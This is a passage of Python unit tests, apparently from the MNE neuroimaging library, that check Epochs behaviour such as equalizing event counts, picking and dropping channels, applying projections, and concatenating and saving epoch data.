raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=True, reject=reject, flat=flat)
epochs2 = bootstrap(epochs, random_state=0)
assert_true(len(epochs2.events) == len(epochs.events))
assert_true(epochs._data.shape == epochs2._data.shape)
def test_epochs_copy():
"""Test copy epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=True, reject=reject, flat=flat)
copied = epochs.copy()
assert_array_equal(epochs._data, copied._data)
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks,
preload=False, reject=reject, flat=flat)
copied = epochs.copy()
data = epochs.get_data()
copied_data = copied.get_data()
assert_array_equal(data, copied_data)
def test_iter_evoked():
"""Test the iterator for epochs -> evoked."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:5], event_id, tmin, tmax, picks=picks)
for ii, ev in enumerate(epochs.iter_evoked()):
x = ev.data
y = epochs.get_data()[ii, :, :]
assert_array_equal(x, y)
def test_subtract_evoked():
"""Test subtraction of Evoked from Epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks)
# make sure subraction fails if data channels are missing
assert_raises(ValueError, epochs.subtract_evoked,
epochs.average(picks[:5]))
# do the subraction using the default argument
epochs.subtract_evoked()
# apply SSP now
epochs.apply_proj()
# use preloading and SSP from the start
epochs2 = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks,
preload=True)
evoked = epochs2.average()
epochs2.subtract_evoked(evoked)
# this gives the same result
assert_allclose(epochs.get_data(), epochs2.get_data())
# if we compute the evoked response after subtracting it we get zero
zero_evoked = epochs.average()
data = zero_evoked.data
assert_allclose(data, np.zeros_like(data), atol=1e-15)
def test_epoch_eq():
"""Test epoch count equalization and condition combining."""
raw, events, picks = _get_data()
# equalizing epochs objects
epochs_1 = Epochs(raw, events, event_id, tmin, tmax, picks=picks)
epochs_2 = Epochs(raw, events, event_id_2, tmin, tmax, picks=picks)
epochs_1.drop_bad() # make sure drops are logged
assert_true(len([l for l in epochs_1.drop_log if not l]) ==
len(epochs_1.events))
drop_log1 = epochs_1.drop_log = [[] for _ in range(len(epochs_1.events))]
drop_log2 = [[] if l == ['EQUALIZED_COUNT'] else l for l in
epochs_1.drop_log]
assert_true(drop_log1 == drop_log2)
assert_true(len([l for l in epochs_1.drop_log if not l]) ==
len(epochs_1.events))
assert_true(epochs_1.events.shape[0] != epochs_2.events.shape[0])
equalize_epoch_counts([epochs_1, epochs_2], method='mintime')
assert_true(epochs_1.events.shape[0] == epochs_2.events.shape[0])
epochs_3 = Epochs(raw, events, event_id, tmin, tmax, picks=picks)
epochs_4 = Epochs(raw, events, event_id_2, tmin, tmax, picks=picks)
equalize_epoch_counts([epochs_3, epochs_4], method='truncate')
assert_true(epochs_1.events.shape[0] == epochs_3.events.shape[0])
assert_true(epochs_3.events.shape[0] == epochs_4.events.shape[0])
# equalizing conditions
epochs = Epochs(raw, events, {'a': 1, 'b': 2, 'c': 3, 'd': 4},
tmin, tmax, picks=picks, reject=reject)
epochs.drop_bad() # make sure drops are logged
assert_true(len([l for l in epochs.drop_log if not l]) ==
len(epochs.events))
drop_log1 = deepcopy(epochs.drop_log)
old_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
epochs.equalize_event_counts(['a', 'b'])
# undo the eq logging
drop_log2 = [[] if l == ['EQUALIZED_COUNT'] else l for l in
epochs.drop_log]
assert_true(drop_log1 == drop_log2)
assert_true(len([l for l in epochs.drop_log if not l]) ==
len(epochs.events))
new_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
assert_true(new_shapes[0] == new_shapes[1])
assert_true(new_shapes[2] == new_shapes[2])
assert_true(new_shapes[3] == new_shapes[3])
# now with two conditions collapsed
old_shapes = new_shapes
epochs.equalize_event_counts([['a', 'b'], 'c'])
new_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
assert_true(new_shapes[0] + new_shapes[1] == new_shapes[2])
assert_true(new_shapes[3] == old_shapes[3])
assert_raises(KeyError, epochs.equalize_event_counts, [1, 'a'])
# now let's combine conditions
old_shapes = new_shapes
epochs.equalize_event_counts([['a', 'b'], ['c', 'd']])
new_shapes = [epochs[key].events.shape[0] for key in ['a', 'b', 'c', 'd']]
assert_true(old_shapes[0] + old_shapes[1] == new_shapes[0] + new_shapes[1])
assert_true(new_shapes[0] + new_shapes[1] == new_shapes[2] + new_shapes[3])
assert_raises(ValueError, combine_event_ids, epochs, ['a', 'b'], {'ab': 1})
combine_event_ids(epochs, ['a', 'b'], {'ab': 12}, copy=False)
caught = 0
for key in ['a', 'b']:
try:
epochs[key]
except KeyError:
caught += 1
assert_equal(caught, 2)
assert_true(not np.any(epochs.events[:, 2] == 1))
assert_true(not np.any(epochs.events[:, 2] == 2))
epochs = combine_event_ids(epochs, ['c', 'd'], {'cd': 34})
assert_true(np.all(np.logical_or(epochs.events[:, 2] == 12,
epochs.events[:, 2] == 34)))
assert_true(epochs['ab'].events.shape[0] == old_shapes[0] + old_shapes[1])
assert_true(epochs['ab'].events.shape[0] == epochs['cd'].events.shape[0])
# equalizing with hierarchical tags
epochs = Epochs(raw, events, {'a/x': 1, 'b/x': 2, 'a/y': 3, 'b/y': 4},
tmin, tmax, picks=picks, reject=reject)
cond1, cond2 = ['a', ['b/x', 'b/y']], [['a/x', 'a/y'], 'b']
es = [epochs.copy().equalize_event_counts(c)[0]
for c in (cond1, cond2)]
assert_array_equal(es[0].events[:, 0], es[1].events[:, 0])
cond1, cond2 = ['a', ['b', 'b/y']], [['a/x', 'a/y'], 'x']
for c in (cond1, cond2): # error b/c tag and id mix/non-orthogonal tags
assert_raises(ValueError, epochs.equalize_event_counts, c)
assert_raises(KeyError, epochs.equalize_event_counts,
["a/no_match", "b"])
# test equalization with no events of one type
epochs.drop(np.arange(10))
assert_equal(len(epochs['a/x']), 0)
assert_true(len(epochs['a/y']) > 0)
epochs.equalize_event_counts(['a/x', 'a/y'])
assert_equal(len(epochs['a/x']), 0)
assert_equal(len(epochs['a/y']), 0)
def test_access_by_name():
"""Test accessing epochs by event name and on_missing for rare events."""
tempdir = _TempDir()
raw, events, picks = _get_data()
# Test various invalid inputs
assert_raises(ValueError, Epochs, raw, events, {1: 42, 2: 42}, tmin,
tmax, picks=picks)
assert_raises(ValueError, Epochs, raw, events, {'a': 'spam', 2: 'eggs'},
tmin, tmax, picks=picks)
assert_raises(ValueError, Epochs, raw, events, {'a': 'spam', 2: 'eggs'},
tmin, tmax, picks=picks)
assert_raises(ValueError, Epochs, raw, events, 'foo', tmin, tmax,
picks=picks)
assert_raises(ValueError, Epochs, raw, events, ['foo'], tmin, tmax,
picks=picks)
# Test accessing non-existent events (assumes 12345678 does not exist)
event_id_illegal = dict(aud_l=1, does_not_exist=12345678)
assert_raises(ValueError, Epochs, raw, events, event_id_illegal,
tmin, tmax)
# Test on_missing
assert_raises(ValueError, Epochs, raw, events, 1, tmin, tmax,
on_missing='foo')
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
Epochs(raw, events, event_id_illegal, tmin, tmax, on_missing='warning')
nw = len(w)
assert_true(1 <= nw <= 2)
Epochs(raw, events, event_id_illegal, tmin, tmax, on_missing='ignore')
assert_equal(len(w), nw)
# Test constructing epochs with a list of ints as events
epochs = Epochs(raw, events, [1, 2], tmin, tmax, picks=picks)
for k, v in epochs.event_id.items():
assert_equal(int(k), v)
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax, picks=picks)
assert_raises(KeyError, epochs.__getitem__, 'bar')
data = epochs['a'].get_data()
event_a = events[events[:, 2] == 1]
assert_true(len(data) == len(event_a))
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax, picks=picks,
preload=True)
assert_raises(KeyError, epochs.__getitem__, 'bar')
temp_fname = op.join(tempdir, 'test-epo.fif')
epochs.save(temp_fname)
epochs2 = read_epochs(temp_fname)
for ep in [epochs, epochs2]:
data = ep['a'].get_data()
event_a = events[events[:, 2] == 1]
assert_true(len(data) == len(event_a))
assert_array_equal(epochs2['a'].events, epochs['a'].events)
epochs3 = Epochs(raw, events, {'a': 1, 'b': 2, 'c': 3, 'd': 4},
tmin, tmax, picks=picks, preload=True)
assert_equal(list(sorted(epochs3[('a', 'b')].event_id.values())),
[1, 2])
epochs4 = epochs['a']
epochs5 = epochs3['a']
assert_array_equal(epochs4.events, epochs5.events)
# 20 is our tolerance because epochs are written out as floats
assert_array_almost_equal(epochs4.get_data(), epochs5.get_data(), 20)
epochs6 = epochs3[['a', 'b']]
assert_true(all(np.logical_or(epochs6.events[:, 2] == 1,
epochs6.events[:, 2] == 2)))
assert_array_equal(epochs.events, epochs6.events)
assert_array_almost_equal(epochs.get_data(), epochs6.get_data(), 20)
# Make sure we preserve names
assert_equal(epochs['a']._name, 'a')
assert_equal(epochs[['a', 'b']]['a']._name, 'a')
@requires_pandas
def test_to_data_frame():
"""Test epochs Pandas exporter."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax, picks=picks)
assert_raises(ValueError, epochs.to_data_frame, index=['foo', 'bar'])
assert_raises(ValueError, epochs.to_data_frame, index='qux')
assert_raises(ValueError, epochs.to_data_frame, np.arange(400))
df = epochs.to_data_frame(index=['condition', 'epoch', 'time'],
picks=list(range(epochs.info['nchan'])))
# Default index and picks
df2 = epochs.to_data_frame()
assert_equal(df.index.names, df2.index.names)
assert_array_equal(df.columns.values, epochs.ch_names)
data = np.hstack(epochs.get_data())
assert_true((df.columns == epochs.ch_names).all())
assert_array_equal(df.values[:, 0], data[0] * 1e13)
assert_array_equal(df.values[:, 2], data[2] * 1e15)
for ind in ['time', ['condition', 'time'], ['condition', 'time', 'epoch']]:
df = epochs.to_data_frame(index=ind)
assert_true(df.index.names == ind if isinstance(ind, list) else [ind])
# test that non-indexed data were present as categorial variables
assert_array_equal(sorted(df.reset_index().columns[:3]),
sorted(['time', 'condition', 'epoch']))
def test_epochs_proj_mixin():
"""Test SSP proj methods from ProjMixin class."""
raw, events, picks = _get_data()
for proj in [True, False]:
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
proj=proj)
assert_true(all(p['active'] == proj for p in epochs.info['projs']))
# test adding / deleting proj
if proj:
epochs.get_data()
assert_true(all(p['active'] == proj for p in epochs.info['projs']))
assert_raises(ValueError, epochs.add_proj, epochs.info['projs'][0],
{'remove_existing': True})
assert_raises(ValueError, epochs.add_proj, 'spam')
assert_raises(ValueError, epochs.del_proj, 0)
else:
projs = deepcopy(epochs.info['projs'])
n_proj = len(epochs.info['projs'])
epochs.del_proj(0)
assert_true(len(epochs.info['projs']) == n_proj - 1)
# Test that already existing projections are not added.
epochs.add_proj(projs, remove_existing=False)
assert_true(len(epochs.info['projs']) == n_proj)
epochs.add_proj(projs[:-1], remove_existing=True)
assert_true(len(epochs.info['projs']) == n_proj - 1)
# catch no-gos.
# wrong proj argument
assert_raises(ValueError, Epochs, raw, events[:4], event_id, tmin, tmax,
picks=picks, proj='crazy')
for preload in [True, False]:
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
proj='delayed', preload=preload,
reject=reject).set_eeg_reference()
epochs_proj = Epochs(
raw, events[:4], event_id, tmin, tmax, picks=picks,
proj=True, preload=preload,
reject=reject).set_eeg_reference().apply_proj()
epochs_noproj = Epochs(
raw, events[:4], event_id, tmin, tmax, picks=picks,
proj=False, preload=preload, reject=reject).set_eeg_reference()
assert_allclose(epochs.copy().apply_proj().get_data(),
epochs_proj.get_data(), rtol=1e-10, atol=1e-25)
assert_allclose(epochs.get_data(),
epochs_noproj.get_data(), rtol=1e-10, atol=1e-25)
# make sure data output is constant across repeated calls
# e.g. drop bads
assert_array_equal(epochs.get_data(), epochs.get_data())
assert_array_equal(epochs_proj.get_data(), epochs_proj.get_data())
assert_array_equal(epochs_noproj.get_data(), epochs_noproj.get_data())
# test epochs.next calls
data = epochs.get_data().copy()
data2 = np.array([e for e in epochs])
assert_array_equal(data, data2)
# cross application from processing stream 1 to 2
epochs.apply_proj()
assert_array_equal(epochs._projector, epochs_proj._projector)
assert_allclose(epochs._data, epochs_proj.get_data())
# test mixin against manual application
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=None, proj=False).set_eeg_reference()
data = epochs.get_data().copy()
epochs.apply_proj()
assert_allclose(np.dot(epochs._projector, data[0]), epochs._data[0])
def test_delayed_epochs():
"""Test delayed projection on Epochs."""
raw, events, picks = _get_data()
events = events[:10]
picks = np.concatenate([pick_types(raw.info, meg=True, eeg=True)[::22],
pick_types(raw.info, meg=False, eeg=False,
ecg=True, eog=True)])
picks = np.sort(picks)
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks])
raw.info.normalize_proj()
del picks
n_epochs = 2 # number we expect after rejection
raw.info['lowpass'] = 40. # fake the LP info so no warnings
for decim in (1, 3):
proj_data = Epochs(raw, events, event_id, tmin, tmax, proj=True,
reject=reject, decim=decim)
use_tmin = proj_data.tmin
proj_data = proj_data.get_data()
noproj_data = Epochs(raw, events, event_id, tmin, tmax, proj=False,
reject=reject, decim=decim).get_data()
assert_equal(proj_data.shape, noproj_data.shape)
assert_equal(proj_data.shape[0], n_epochs)
for preload in (True, False):
for proj in (True, False, 'delayed'):
for ii in range(3):
print(decim, preload, proj, ii)
comp = proj_data if proj is True else noproj_data
if ii in (0, 1):
epochs = Epochs(raw, events, event_id, tmin, tmax,
proj=proj, reject=reject,
preload=preload, decim=decim)
else:
fake_events = np.zeros((len(comp), 3), int)
fake_events[:, 0] = np.arange(len(comp))
fake_events[:, 2] = 1
epochs = EpochsArray(comp, raw.info, tmin=use_tmin,
event_id=1, events=fake_events,
proj=proj)
epochs.info['sfreq'] /= decim
assert_equal(len(epochs), n_epochs)
assert_true(raw.proj is False)
assert_true(epochs.proj is
(True if proj is True else False))
if ii == 1:
epochs.load_data()
picks_data = pick_types(epochs.info, meg=True, eeg=True)
evoked = epochs.average(picks=picks_data)
assert_equal(evoked.nave, n_epochs, epochs.drop_log)
if proj is True:
evoked.apply_proj()
else:
assert_true(evoked.proj is False)
assert_array_equal(evoked.ch_names,
np.array(epochs.ch_names)[picks_data])
assert_allclose(evoked.times, epochs.times)
epochs_data = epochs.get_data()
assert_allclose(evoked.data,
epochs_data.mean(axis=0)[picks_data],
rtol=1e-5, atol=1e-20)
assert_allclose(epochs_data, comp, rtol=1e-5, atol=1e-20)
def test_drop_epochs():
"""Test dropping of epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks)
events1 = events[events[:, 2] == event_id]
# Bound checks
assert_raises(IndexError, epochs.drop, [len(epochs.events)])
assert_raises(IndexError, epochs.drop, [-1])
assert_raises(ValueError, epochs.drop, [[1, 2], [3, 4]])
# Test selection attribute
assert_array_equal(epochs.selection,
np.where(events[:, 2] == event_id)[0])
assert_equal(len(epochs.drop_log), len(events))
assert_true(all(epochs.drop_log[k] == ['IGNORED']
for k in set(range(len(events))) - set(epochs.selection)))
selection = epochs.selection.copy()
n_events = len(epochs.events)
epochs.drop([2, 4], reason='d')
assert_equal(epochs.drop_log_stats(), 2. / n_events * 100)
assert_equal(len(epochs.drop_log), len(events))
assert_equal([epochs.drop_log[k]
for k in selection[[2, 4]]], [['d'], ['d']])
assert_array_equal(events[epochs.selection], events1[[0, 1, 3, 5, 6]])
assert_array_equal(events[epochs[3:].selection], events1[[5, 6]])
assert_array_equal(events[epochs['1'].selection], events1[[0, 1, 3, 5, 6]])
def test_drop_epochs_mult():
"""Test that subselecting epochs or making less epochs is equivalent."""
raw, events, picks = _get_data()
for preload in [True, False]:
epochs1 = Epochs(raw, events, {'a': 1, 'b': 2},
tmin, tmax, picks=picks, reject=reject,
preload=preload)['a']
epochs2 = Epochs(raw, events, {'a': 1},
tmin, tmax, picks=picks, reject=reject,
preload=preload)
if preload:
# In the preload case you cannot know the bads if already ignored
assert_equal(len(epochs1.drop_log), len(epochs2.drop_log))
for d1, d2 in zip(epochs1.drop_log, epochs2.drop_log):
if d1 == ['IGNORED']:
assert_true(d2 == ['IGNORED'])
if d1 != ['IGNORED'] and d1 != []:
assert_true((d2 == d1) or (d2 == ['IGNORED']))
if d1 == []:
assert_true(d2 == [])
assert_array_equal(epochs1.events, epochs2.events)
assert_array_equal(epochs1.selection, epochs2.selection)
else:
# In the non preload is should be exactly the same
assert_equal(epochs1.drop_log, epochs2.drop_log)
assert_array_equal(epochs1.events, epochs2.events)
assert_array_equal(epochs1.selection, epochs2.selection)
def test_contains():
"""Test membership API."""
raw, events = _get_data(True)[:2]
# Add seeg channel
seeg = RawArray(np.zeros((1, len(raw.times))),
create_info(['SEEG 001'], raw.info['sfreq'], 'seeg'))
for key in ('dev_head_t', 'buffer_size_sec', 'highpass', 'lowpass',
'dig', 'description', 'acq_pars', 'experimenter',
'proj_name'):
seeg.info[key] = raw.info[key]
raw.add_channels([seeg])
tests = [(('mag', False, False), ('grad', 'eeg', 'seeg')),
(('grad', False, False), ('mag', 'eeg', 'seeg')),
((False, True, False), ('grad', 'mag', 'seeg')),
((False, False, True), ('grad', 'mag', 'eeg'))]
for (meg, eeg, seeg), others in tests:
picks_contains = pick_types(raw.info, meg=meg, eeg=eeg, seeg=seeg)
epochs = Epochs(raw, events, {'a': 1, 'b': 2}, tmin, tmax,
picks=picks_contains)
if eeg:
test = 'eeg'
elif seeg:
test = 'seeg'
else:
test = meg
assert_true(test in epochs)
assert_true(not any(o in epochs for o in others))
assert_raises(ValueError, epochs.__contains__, 'foo')
assert_raises(ValueError, epochs.__contains__, 1)
def test_drop_channels_mixin():
"""Test channels-dropping functionality."""
raw, events = _get_data()[:2]
# here without picks to get additional coverage
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=True)
drop_ch = epochs.ch_names[:3]
ch_names = epochs.ch_names[3:]
ch_names_orig = epochs.ch_names
dummy = epochs.copy().drop_channels(drop_ch)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, epochs.ch_names)
assert_equal(len(ch_names_orig), epochs.get_data().shape[1])
epochs.drop_channels(drop_ch)
assert_equal(ch_names, epochs.ch_names)
assert_equal(len(ch_names), epochs.get_data().shape[1])
def test_pick_channels_mixin():
"""Test channel-picking functionality."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
preload=True)
ch_names = epochs.ch_names[:3]
epochs.preload = False
assert_raises(RuntimeError, epochs.drop_channels, [ch_names[0]])
epochs.preload = True
ch_names_orig = epochs.ch_names
dummy = epochs.copy().pick_channels(ch_names)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, epochs.ch_names)
assert_equal(len(ch_names_orig), epochs.get_data().shape[1])
epochs.pick_channels(ch_names)
assert_equal(ch_names, epochs.ch_names)
assert_equal(len(ch_names), epochs.get_data().shape[1])
# Invalid picks
assert_raises(ValueError, Epochs, raw, events, event_id, tmin, tmax,
picks=[])
def test_equalize_channels():
"""Test equalization of channels."""
raw, events, picks = _get_data()
epochs1 = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
proj=False, preload=True)
epochs2 = epochs1.copy()
ch_names = epochs1.ch_names[2:]
epochs1.drop_channels(epochs1.ch_names[:1])
epochs2.drop_channels(epochs2.ch_names[1:2])
my_comparison = [epochs1, epochs2]
equalize_channels(my_comparison)
for e in my_comparison:
assert_equal(ch_names, e.ch_names)
def test_illegal_event_id():
"""Test handling of invalid events ids."""
raw, events, picks = _get_data()
event_id_illegal = dict(aud_l=1, does_not_exist=12345678)
assert_raises(ValueError, Epochs, raw, events, event_id_illegal, tmin,
tmax, picks=picks, proj=False)
def test_add_channels_epochs():
"""Test adding channels"""
raw, events, picks = _get_data()
def make_epochs(picks, proj):
return Epochs(raw, events, event_id, tmin, tmax, preload=True,
proj=proj, picks=picks)
picks = pick_types(raw.info, meg=True, eeg=True, exclude='bads')
picks_meg = pick_types(raw.info, meg=True, eeg=False, exclude='bads')
picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')
for proj in (False, True):
epochs = make_epochs(picks=picks, proj=proj)
epochs_meg = make_epochs(picks=picks_meg, proj=proj)
epochs_eeg = make_epochs(picks=picks_eeg, proj=proj)
epochs.info._check_consistency()
epochs_meg.info._check_consistency()
epochs_eeg.info._check_consistency()
epochs2 = add_channels_epochs([epochs_meg, epochs_eeg])
assert_equal(len(epochs.info['projs']), len(epochs2.info['projs']))
assert_equal(len(epochs.info.keys()), len(epochs_meg.info.keys()))
assert_equal(len(epochs.info.keys()), len(epochs_eeg.info.keys()))
assert_equal(len(epochs.info.keys()), len(epochs2.info.keys()))
data1 = epochs.get_data()
data2 = epochs2.get_data()
data3 = np.concatenate([e.get_data() for e in
[epochs_meg, epochs_eeg]], axis=1)
assert_array_equal(data1.shape, data2.shape)
assert_allclose(data1, data3, atol=1e-25)
assert_allclose(data1, data2, atol=1e-25)
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['meas_date'] += 10
add_channels_epochs([epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs2 = add_channels_epochs([epochs_meg, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.events[3, 2] -= 1
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
assert_raises(ValueError, add_channels_epochs,
[epochs_meg, epochs_eeg[:2]])
epochs_meg.info['chs'].pop(0)
epochs_meg.info._update_redundant()
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['sfreq'] = None
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['sfreq'] += 10
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['chs'][1]['ch_name'] = epochs_meg2.info['ch_names'][0]
epochs_meg2.info._update_redundant()
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['dev_head_t']['to'] += 1
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['dev_head_t']['to'] += 1
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.info['expimenter'] = 'foo'
assert_raises(RuntimeError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.preload = False
assert_raises(ValueError, add_channels_epochs, [epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.times += 0.4
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.times += 0.5
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.baseline = None
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
epochs_meg2 = epochs_meg.copy()
epochs_meg2.event_id['b'] = 2
assert_raises(NotImplementedError, add_channels_epochs,
[epochs_meg2, epochs_eeg])
def test_array_epochs():
"""Test creating epochs from array."""
import matplotlib.pyplot as plt
tempdir = _TempDir()
# creating
data = rng.random_sample((10, 20, 300))
sfreq = 1e3
ch_names = ['EEG %03d' % (i + 1) for i in range(20)]
types = ['eeg'] * 20
info = create_info(ch_names, sfreq, types)
events = np.c_[np.arange(1, 600, 60),
np.zeros(10, int),
[1, 2] * 5]
event_id = {'a': 1, 'b': 2}
epochs = EpochsArray(data, info, events, tmin, event_id)
assert_true(str(epochs).startswith('<EpochsArray'))
# From GH#1963
assert_raises(ValueError, EpochsArray, data[:-1], info, events, tmin,
event_id)
assert_raises(ValueError, EpochsArray, data, info, events, tmin,
dict(a=1))
# saving
temp_fname = op.join(tempdir, 'test-epo.fif')
epochs.save(temp_fname)
epochs2 = read_epochs(temp_fname)
data2 = epochs2.get_data()
assert_allclose(data, data2)
assert_allclose(epochs.times, epochs2.times)
assert_equal(epochs.event_id, epochs2.event_id)
assert_array_equal(epochs.events, epochs2.events)
# plotting
epochs[0].plot()
plt.close('all')
# indexing
assert_array_equal(np.unique(epochs['a'].events[:, 2]), np.array([1]))
assert_equal(len(epochs[:2]), 2)
data[0, 5, 150] = 3000
data[1, :, :] = 0
data[2, 5, 210] = 3000
data[3, 5, 260] = 0
epochs = EpochsArray(data, info, events=events, event_id=event_id,
tmin=0, reject=dict(eeg=1000), flat=dict(eeg=1e-1),
reject_tmin=0.1, reject_tmax=0.2)
assert_equal(len(epochs), len(events) - 2)
assert_equal(epochs.drop_log[0], ['EEG 006'])
assert_equal(len(epochs.drop_log), 10)
assert_equal(len(epochs.events), len(epochs.selection))
# baseline
data = np.ones((10, 20, 300))
epochs = EpochsArray(data, info, events, event_id=event_id, tmin=-.2,
baseline=(None, 0))
ep_data = epochs.get_data()
assert_array_equal(ep_data, np.zeros_like(ep_data))
# one time point
epochs = EpochsArray(data[:, :, :1], info, events=events,
event_id=event_id, tmin=0.)
assert_allclose(epochs.times, [0.])
assert_allclose(epochs.get_data(), data[:, :, :1])
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname)
assert_allclose(epochs_read.times, [0.])
assert_allclose(epochs_read.get_data(), data[:, :, :1])
# event as integer (#2435)
mask = (events[:, 2] == 1)
data_1 = data[mask]
events_1 = events[mask]
epochs = EpochsArray(data_1, info, events=events_1, event_id=1, tmin=-0.2)
# default events
epochs = EpochsArray(data_1, info)
assert_array_equal(epochs.events[:, 0], np.arange(len(data_1)))
assert_array_equal(epochs.events[:, 1], np.zeros(len(data_1), int))
assert_array_equal(epochs.events[:, 2], np.ones(len(data_1), int))
def test_concatenate_epochs():
"""Test concatenate epochs."""
raw, events, picks = _get_data()
epochs = Epochs(raw=raw, events=events, event_id=event_id, tmin=tmin,
tmax=tmax, picks=picks)
epochs2 = epochs.copy()
epochs_list = [epochs, epochs2]
epochs_conc = concatenate_epochs(epochs_list)
assert_array_equal(
epochs_conc.events[:, 0], np.unique(epochs_conc.events[:, 0]))
expected_shape = list(epochs.get_data().shape)
expected_shape[0] *= 2
expected_shape = tuple(expected_shape)
assert_equal(epochs_conc.get_data().shape, expected_shape)
assert_equal(epochs_conc.drop_log, epochs.drop_log * 2)
epochs2 = epochs.copy()
epochs2._data = epochs2.get_data()
epochs2.preload = True
assert_raises(
ValueError, concatenate_epochs,
[epochs, epochs2.copy().drop_channels(epochs2.ch_names[:1])])
epochs2.times = np.delete(epochs2.times, 1)
assert_raises(
ValueError,
concatenate_epochs, [epochs, epochs2])
assert_equal(epochs_conc._raw, None)
# check if baseline is same for all epochs
epochs2.baseline = (-0.1, None)
assert_raises(ValueError, concatenate_epochs, [epochs, epochs2])
# check if dev_head_t is same
epochs2 = epochs.copy()
concatenate_epochs([epochs, epochs2]) # should work
epochs2.info['dev_head_t']['trans'][:3, 3] += 0.0001
assert_raises(ValueError, concatenate_epochs, [epochs, epochs2])
assert_raises(TypeError, concatenate_epochs, 'foo')
assert_raises(TypeError, concatenate_epochs, [epochs, 'foo'])
epochs2.info['dev_head_t'] = None
assert_raises(ValueError, concatenate_epochs, [epochs, epochs2])
epochs.info['dev_head_t'] = None
concatenate_epochs([epochs, epochs2]) # should work
# check that different event_id does not work:
epochs1 = epochs.copy()
epochs2 = epochs.copy()
epochs1.event_id = dict(a=1)
epochs2.event_id = dict(a=2)
assert_raises(ValueError, concatenate_epochs, [epochs1, epochs2])
def test_add_channels():
"""Test epoch splitting / re-appending channel types."""
raw, events, picks = _get_data()
epoch_nopre = Epochs(
raw=raw, events=events, event_id=event_id, tmin=tmin, tmax=tmax,
picks=picks)
epoch = Epochs(
raw=raw, events=events, event_id=event_id, tmin=tmin, tmax=tmax,
picks=picks, preload=True)
epoch_eeg = epoch.copy().pick_types(meg=False, eeg=True)
epoch_meg = epoch.copy().pick_types(meg=True)
epoch_stim = epoch.copy().pick_types(meg=False, stim=True)
epoch_eeg_meg = epoch.copy().pick_types(meg=True, eeg=True)
epoch_new = epoch_meg.copy().add_channels([epoch_eeg, epoch_stim])
assert_true(all(ch in epoch_new.ch_names
for ch in epoch_stim.ch_names + epoch_meg.ch_names))
epoch_new = epoch_meg.copy().add_channels([epoch_eeg])
assert_true(ch in epoch_new.ch_names for ch in epoch.ch_names)
assert_array_equal(epoch_new._data, epoch_eeg_meg._data)
assert_true(all(ch not in epoch_new.ch_names
for ch in epoch_stim.ch_names))
# Now test errors
epoch_badsf = epoch_eeg.copy()
epoch_badsf.info['sfreq'] = 3.1415927
epoch_eeg = epoch_eeg.crop(-.1, .1)
assert_raises(AssertionError, epoch_meg.add_channels, [epoch_nopre])
assert_raises(RuntimeError, epoch_meg.add_channels, [epoch_badsf])
assert_raises(AssertionError, epoch_meg.add_channels, [epoch_eeg])
assert_raises(ValueError, epoch_meg.add_channels, [epoch_meg])
assert_raises(AssertionError, epoch_meg.add_channels, epoch_badsf)
def test_seeg_ecog():
"""Test the compatibility of the Epoch object with SEEG and ECoG data."""
n_epochs, n_channels, n_times, sfreq = 5, 10, 20, 1000.
data = np.ones((n_epochs, n_channels, n_times))
events = np.array([np.arange(n_epochs), [0] * n_epochs, [1] * n_epochs]).T
pick_dict = dict(meg=False, exclude=[])
for key in ('seeg', 'ecog'):
info = create_info(n_channels, sfreq, key)
